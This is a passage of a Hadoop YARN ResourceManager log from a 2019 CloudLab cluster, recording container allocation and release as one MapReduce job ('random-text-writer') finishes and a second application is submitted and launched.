2019-09-23 17:08:13,101 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000005 in state: COMPLETED event:FINISHED
2019-09-23 17:08:13,101 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000005
2019-09-23 17:08:13,101 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 17:08:13,101 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000005 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 17:08:13,851 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000011 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 17:08:13,852 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000011 in state: RELEASED event:RELEASED
2019-09-23 17:08:13,852 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000011
2019-09-23 17:08:13,852 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:08:13,853 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000011 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: RELEASED
2019-09-23 17:08:13,957 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000006 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:13,957 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000006 in state: COMPLETED event:FINISHED
2019-09-23 17:08:13,957 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000006
2019-09-23 17:08:13,957 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
2019-09-23 17:08:13,957 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000006 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 17:08:14,035 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000008 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:14,035 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000008 in state: COMPLETED event:FINISHED
2019-09-23 17:08:14,035 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000008
2019-09-23 17:08:14,035 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available, release resources=true
2019-09-23 17:08:14,035 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000008 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=3 available=<memory:61440, vCores:29> used=<memory:4096, vCores:3> with event: FINISHED
2019-09-23 17:08:14,785 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000007 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:14,786 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000007 in state: COMPLETED event:FINISHED
2019-09-23 17:08:14,786 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000007
2019-09-23 17:08:14,786 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available, release resources=true
2019-09-23 17:08:14,786 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000007 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=2 available=<memory:62464, vCores:30> used=<memory:3072, vCores:2> with event: FINISHED
2019-09-23 17:08:15,464 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0001_000001 with final state: FINISHING, and exit status: -1000
2019-09-23 17:08:15,465 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from RUNNING to FINAL_SAVING
2019-09-23 17:08:15,465 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569279589137_0001 with final state: FINISHING
2019-09-23 17:08:15,465 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from RUNNING to FINAL_SAVING
2019-09-23 17:08:15,466 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from FINAL_SAVING to FINISHING
2019-09-23 17:08:15,466 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569279589137_0001
2019-09-23 17:08:15,466 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from FINAL_SAVING to FINISHING
2019-09-23 17:08:15,787 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000009 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:15,788 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000009 in state: COMPLETED event:FINISHED
2019-09-23 17:08:15,788 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000009
2019-09-23 17:08:15,788 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available, release resources=true
2019-09-23 17:08:15,788 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000009 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=1 available=<memory:63488, vCores:31> used=<memory:2048, vCores:1> with event: FINISHED
2019-09-23 17:08:16,471 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: application_1569279589137_0001 unregistered successfully. 
2019-09-23 17:08:21,810 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000001 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:21,811 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000001 in state: COMPLETED event:FINISHED
2019-09-23 17:08:21,811 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0001_000001
2019-09-23 17:08:21,811 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000001
2019-09-23 17:08:21,811 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 17:08:21,811 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: FINISHED
2019-09-23 17:08:21,812 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0001_000001
2019-09-23 17:08:21,812 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from FINISHING to FINISHED
2019-09-23 17:08:21,815 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from FINISHING to FINISHED
2019-09-23 17:08:21,815 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0001_000001 is done. finalState=FINISHED
2019-09-23 17:08:21,815 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0001 requests cleared
2019-09-23 17:08:21,816 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=Application Finished - Succeeded	TARGET=RMAppManager	RESULT=SUCCESS	APPID=application_1569279589137_0001
2019-09-23 17:08:21,817 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569279589137_0001_000001
2019-09-23 17:08:21,819 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569279589137_0001,name=random-text-writer,user=F19_TIP,queue=root.F19_TIP,state=FINISHED,trackingUrl=http://master_hostname:8088/proxy/application_1569279589137_0001/,appMasterHost=cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us,startTime=1569280077886,finishTime=1569280095465,finalStatus=SUCCEEDED,memorySeconds=82050,vcoreSeconds=54,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=MAPREDUCE
2019-09-23 17:08:22,844 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 17:09:49,124 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler: Release request cache is cleaned up
2019-09-23 17:11:06,735 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 2
2019-09-23 17:11:07,848 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 2 submitted by user F19_TIP
2019-09-23 17:11:07,849 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569279589137_0002
2019-09-23 17:11:07,849 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.96	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569279589137_0002
2019-09-23 17:11:07,849 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569279589137_0002
2019-09-23 17:11:07,849 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from NEW to NEW_SAVING
2019-09-23 17:11:07,850 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from NEW_SAVING to SUBMITTED
2019-09-23 17:11:07,850 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569279589137_0002 from user: F19_TIP, in queue: default, currently num of applications: 1
2019-09-23 17:11:07,851 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from SUBMITTED to ACCEPTED
2019-09-23 17:11:07,851 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0002_000001
2019-09-23 17:11:07,851 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from NEW to SUBMITTED
2019-09-23 17:11:07,852 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0002_000001 to scheduler from user: F19_TIP
2019-09-23 17:11:07,853 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 17:11:08,121 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:08,122 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000001
2019-09-23 17:11:08,122 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available after allocation
2019-09-23 17:11:08,124 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0002_01_000001
2019-09-23 17:11:08,126 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:08,127 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0002_000001
2019-09-23 17:11:08,127 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0002 AttemptId: appattempt_1569279589137_0002_000001 MasterContainer: Container: [ContainerId: container_1569279589137_0002_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:11:08,127 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:11:08,127 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:11:08,128 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0002_000001
2019-09-23 17:11:08,132 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0002_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0002_000001
2019-09-23 17:11:08,132 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0002_01_000001 : $JAVA_HOME/bin/java -Djava.io.tmpdir=$PWD/tmp -Dlog4j.configuration=container-log4j.properties -Dyarn.app.container.log.dir=<LOG_DIR> -Dyarn.app.container.log.filesize=0 -Dhadoop.root.logger=INFO,CLA -Dhadoop.root.logfile=syslog  -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1><LOG_DIR>/stdout 2><LOG_DIR>/stderr 
2019-09-23 17:11:08,132 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0002_000001
2019-09-23 17:11:08,133 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0002_000001
2019-09-23 17:11:08,151 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0002_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0002_000001
2019-09-23 17:11:08,151 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 17:11:09,123 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:12,227 INFO SecurityLogger.org.apache.hadoop.ipc.Server: Auth successful for appattempt_1569279589137_0002_000001 (auth:SIMPLE)
2019-09-23 17:11:12,232 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: AM registration appattempt_1569279589137_0002_000001
2019-09-23 17:11:12,232 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=Register App Master	TARGET=ApplicationMasterService	RESULT=SUCCESS	APPID=application_1569279589137_0002	APPATTEMPTID=appattempt_1569279589137_0002_000001
2019-09-23 17:11:12,232 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0002_000001 State change from LAUNCHED to RUNNING
2019-09-23 17:11:12,233 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0002 State change from ACCEPTED to RUNNING
2019-09-23 17:11:14,131 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000002 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:14,131 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000002
2019-09-23 17:11:14,131 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available after allocation
2019-09-23 17:11:14,291 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0002_01_000002
2019-09-23 17:11:14,293 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000002 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:15,133 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000002 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:15,134 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000003 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:15,134 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000003
2019-09-23 17:11:15,135 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available after allocation
2019-09-23 17:11:15,314 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000003 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:16,134 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000003 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:16,135 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000004 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:16,135 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000004
2019-09-23 17:11:16,135 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available after allocation
2019-09-23 17:11:16,324 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000004 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:16,945 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000004 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:16,946 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000005 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:16,946 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000005
2019-09-23 17:11:16,947 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 17:11:17,331 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000005 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:17,946 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000005 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:17,946 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000002 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:11:17,946 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0002_01_000002 in state: COMPLETED event:FINISHED
2019-09-23 17:11:17,947 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000002
2019-09-23 17:11:17,947 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0002_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
2019-09-23 17:11:17,947 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0002_000001 released container container_1569279589137_0002_01_000002 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 17:11:17,947 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000006 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:17,947 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000006
2019-09-23 17:11:17,947 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 17:11:18,028 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000007 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:11:18,028 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0002	CONTAINERID=container_1569279589137_0002_01_000007
2019-09-23 17:11:18,028 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0002_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:11:18,339 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000006 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:18,341 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000007 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:11:18,952 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000006 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:11:18,953 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0002_01_000007 Container Transitioned from ACQUIRED to RUNNING
